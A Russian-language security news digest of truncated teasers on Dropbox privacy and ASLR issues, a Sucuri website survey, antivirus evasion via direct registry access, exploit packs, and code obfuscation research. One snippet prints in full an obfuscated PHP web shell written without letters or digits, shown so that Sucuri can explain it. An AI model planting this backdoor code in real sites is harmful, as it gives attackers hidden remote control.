Не секрет, что в документы MS Office или PDF можно вставить специальные следящие скрипты для проверки, с какого IP открыли файл, в какое время и т.д. Такими средствами давно пользуются маркетологи. Каждый раз при открытии файла документ отправляет GET-запрос на удаленный сервер, где регистрируется это событие. Среди прочих, возможность внедрения следящих скриптов предлагает сервис HoneyDocs.

Один из пользователей HoneyDocs внедрил скрипт в файл passwords.doc — и закачал его в свою личную папку Dropbox. Каково же было его удивление, когда через 10 минут на сервере появилось сообщение, что файл открыт. Ведь он еще ни с кем не делился ссылкой, да и вообще закачал файл в персональную папку, к которой запрещен посторонний доступ.

Пользователь продолжил свой эксперимент. Он удалил файл и закачал его повторно. В этот раз посторонних посещений не было, но они были ... Читать дальше »

Специалист по безопасности и пользователь программы Dropbox Грэм Сазерленд (Graham Sutherland) обнаружил уязвимость в клиентском приложении Dropbox под Windows (32 бит).

128-килобайтная библиотека DropboxExt19.dll загружается в память, внедряясь в различные процессы, чтобы обеспечить контекстную функциональность, в том числе вызываемую по щелчку правой кнопки мыши.

Среди прочего, она внедряется также в firefox.exe и другие процессы.

Но самое интересное, что эта библиотека не использует технологию рандомизации памяти ASLR (Address space layout randomization).

ASLR — один из главных механизмов защиты операционной системы Windows от запуска различных эксплойтов, в том числе с переполнением буфера. Как показывает практика с последними браузерным ... Читать дальше »

Компания Sucuri осуществила проверку миллиона крупнейших сайтов интернета (по версии Alexa) на предмет уязвимостей, устаревшего серверного ПО и зловредов. Результаты плачевны.

Из миллиона сайтов 108 781 признаны небезопасными, а 18 557 из них уже внесены в черные списки антивирусных компаний и поисковых систем. На диаграмме можно увидеть, что самая большая в мире база зараженных сайтов — у McAffee, на втором месте Sucuri Labs, а на третьем — российский «Яндекс», далее следуют Norton, ESET и Google. База вредоносных сайтов «Яндекса» по этой выборке примерно в шесть раз полнее, чем у Google: 2154 штуки против 357.

Еще 4836 сайтов из миллиона заражены поисковым спамом — самым популярным методом инъекций.

Пугающе много сайтов (67 509) работают под устаревшим и уя ... Читать дальше »

Администратор одного из веб-сайтов жалуется, что его сайт подвергся взлому. Он обнаружил PHP-шелл, в коде которого не было ни одной буквы или цифры.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Админ просит объяснить, что это такое. Специалисты компании Sucuri объясняют, что суть бэкдоров в максимальной скрытности, поэтому их авторы часто прибегают к необычным методам обфускации. Например, первая строчка @$_[] ... Читать дальше »

Внедряемся в святая святых системы минуя стандартные механизмы

Сегодня мы попробуем залезть в реестр Windows с черного хода, без использования штатных WinAPI-функций, для этого предназначенных. Что нам это даст в итоге? Возможность писать и читать из реестра напрямую, в обход ограничений, установленных разработчиками антивирусных решений!

Забегая вперед, отмечу: тема эта интересна, но тут целый набор серьезных проблем. Хотя кто сказал, что нам это не по плечу? :)

Что такое реестр, или немного лирики

С точки зрения операционной системы Windows, реестр — это уникальная кладовка. В этой своеобразно выстроенной иерархической базе данных хранятся настройки, данные, регистрационная информация и прочая хрень почти обо всем в системе, начиная с программ и заканчивая настройками конкретного пользователя. В реестре хранится практически все. Несмотря на то что некоторые программы предпочитают хранить свои настройки в ini-кон ... Читать дальше »

Эксплуатация уязвимостей в программном обеспечении на стороне конечного пользователя стала одним из основных трендов на черном рынке. Аналитические компании прогнозируют стабильный рост доходов киберпреступников от услуг предоставления средств компрометации. Взглянем на антивирусную защиту с позиции обладателя топовой связки сплоитов.

Методика тестирования

В числе топовых на черном рынке эксплойт-паков сейчас находит ... Читать дальше »

Ученые из Калифорнийского университета в Лос-Анджелесе разработали новый механизм обфускации кода, основанный на функциональном шифровании, который должен надежно защитить исходный код программ от попыток реверс-инжиниринга. «Вы пишете программный код в нормальном, понятном, читаемом виде, а затем загружаете его в нашу систему, — объясняет профессор Амат Сахаи (Amat Sahai), один из авторов научной работы. — На выходе получается математически измененный образец программного обеспечения, который эквивалентен по функциональности, но если посмотреть на него, вы не сможете догадаться, что он делает».

Сахаи с коллегами уверяют: впервые техника обфускации позволяет добиться столь надежн ... Читать дальше »

Потому что все очень-очень просто! Все сайты интимных знакомств – это новая популярная разновидность лохотрона, новый метод зарабатывания денег на человеческих слабостях.

Как обманывают доверчивых мужчин?

Х ... Читать дальше »